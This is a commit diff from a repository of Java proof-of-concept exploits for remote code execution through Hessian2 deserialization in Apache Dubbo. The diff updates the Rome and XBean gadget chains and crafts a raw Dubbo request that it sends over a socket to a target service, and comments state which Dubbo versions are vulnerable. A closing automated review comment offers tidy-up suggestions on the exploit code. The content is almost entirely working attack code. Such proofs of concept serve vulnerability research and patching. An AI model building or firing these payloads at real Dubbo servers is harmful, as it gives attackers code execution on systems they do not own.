
Commit 4632e4b

author
threedr3am
committed
fix:xbean poc
1 parent 0f4123a commit 4632e4b


3 files changed

+27
-12
lines changed


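--- a/dubbo/pom.xml
+++ b/dubbo/pom.xml
@@ -10,6 +10,7 @@
 <modelVersion>4.0.0</modelVersion>
 
 <artifactId>dubbo</artifactId>
+<version>1.0-SNAPSHOT</version>
 <packaging>pom</packaging>
 
 <properties>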

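--- a/dubbo/src/main/java/com/threedr3am/bug/dubbo/RomePoc.java
+++ b/dubbo/src/main/java/com/threedr3am/bug/dubbo/RomePoc.java
@@ -1,10 +1,12 @@
 package com.threedr3am.bug.dubbo;
 
+import com.caucho.hessian.io.Hessian2Output;
 import com.rometools.rome.feed.impl.EqualsBean;
 import com.rometools.rome.feed.impl.ToStringBean;
 import com.sun.rowset.JdbcRowSetImpl;
 import com.threedr3am.bug.common.server.LdapServer;
 import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.dubbo.support.NoWriteReplaceSerializerFactory;
 import java.io.ByteArrayOutputStream;
 import java.io.OutputStream;
 import java.lang.reflect.Array;
@@ -14,7 +16,6 @@
 import java.util.Random;
 import org.apache.dubbo.common.io.Bytes;
 import org.apache.dubbo.common.serialize.Cleanable;
-import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
 
 /**
 * dubbo 默认配置,即hessian2反序列化,都可RCE(dubbo版本<=2.7.5)
@@ -80,7 +81,10 @@ public static void main(String[] args) throws Exception {
 Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
 
 ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
-Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
+Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
 
 out.writeObject(s);
 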
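--- a/dubbo/src/main/java/com/threedr3am/bug/dubbo/XBeanPoc.java
+++ b/dubbo/src/main/java/com/threedr3am/bug/dubbo/XBeanPoc.java
@@ -1,24 +1,26 @@
 package com.threedr3am.bug.dubbo;
 
+import com.caucho.hessian.io.Hessian2Output;
 import com.threedr3am.bug.common.server.HTTPServer;
 import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.dubbo.support.NoWriteReplaceSerializerFactory;
 import com.threedr3am.bug.dubbo.utils.ToStringUtil;
 import java.io.ByteArrayOutputStream;
 import java.io.OutputStream;
 import java.net.Socket;
+import java.util.HashMap;
 import java.util.Random;
 import javax.naming.Context;
 import javax.naming.Reference;
 import org.apache.dubbo.common.io.Bytes;
 import org.apache.dubbo.common.serialize.Cleanable;
-import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
 import org.apache.xbean.naming.context.ContextUtil.ReadOnlyBinding;
 import org.apache.xbean.naming.context.WritableContext;
 
 /**
 * dubbo 默认配置,即hessian2反序列化,都可RCE
 *
-* Spring环境可打,暂时测试Spring-boot打不了
+* 需要dubbo环境版本<=2.6.3
 *
 * <dependency>
 * <groupId>org.apache.xbean</groupId>
@@ -48,20 +50,28 @@ public static void main(String[] args) throws Exception {
 // set magic number.
 Bytes.short2bytes((short) 0xdabb, header);
 // set request and serialization flag.
-header[2] = (byte) ((byte) 0x80 | 0x20 | 2);
+header[2] = (byte) ((byte) 0x80 | 2);
 
 // set request id.
 Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
 
 ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
-Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
+Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
 
+//todo 经测试,以下4个随意填
+//注册中心获取到的service全限定名、版本号、方法名
+out.writeString("2.0.2");
+out.writeString("com.threedr3am.learn.server.boot.DemoXXXXXXXXService");
+out.writeString("1.0");
+out.writeString("hello");
+//todo 方法描述不需要修改,因为此处需要指定map的payload去触发
+out.writeString("Ljava/util/Map;");
 out.writeObject(s);
-
-out.flushBuffer();
-if (out instanceof Cleanable) {
-((Cleanable) out).cleanup();
-}
+out.writeObject(new HashMap());
+out.close();
 
 Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
 byteArrayOutputStream.write(header);
@@ -70,7 +80,7 @@ public static void main(String[] args) throws Exception {
 byte[] bytes = byteArrayOutputStream.toByteArray();
 
 //todo 此处填写被攻击的dubbo服务提供者地址和端口
-Socket socket = new Socket("127.0.0.1", 20880);
+Socket socket = new Socket("127.0.0.1", 20881);
 OutputStream outputStream = socket.getOutputStream();
 outputStream.write(bytes);
 outputStream.flush();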
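Review bot: The second hunk removes the only visible use of `Cleanable` (the `if (out instanceof Cleanable)` block) while the first hunk keeps `import org.apache.dubbo.common.serialize.Cleanable;`, so that import now looks dead unless the part of the file outside these hunks still references it; it should be dropped alongside the `Hessian2ObjectOutput` import this commit already removes. In the same hunk, `out.writeObject(new HashMap());` uses a raw type — `new HashMap<>()` keeps the compiler warning-free without changing behavior. The `main` method these hunks belong to starts and ends outside the shown lines.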
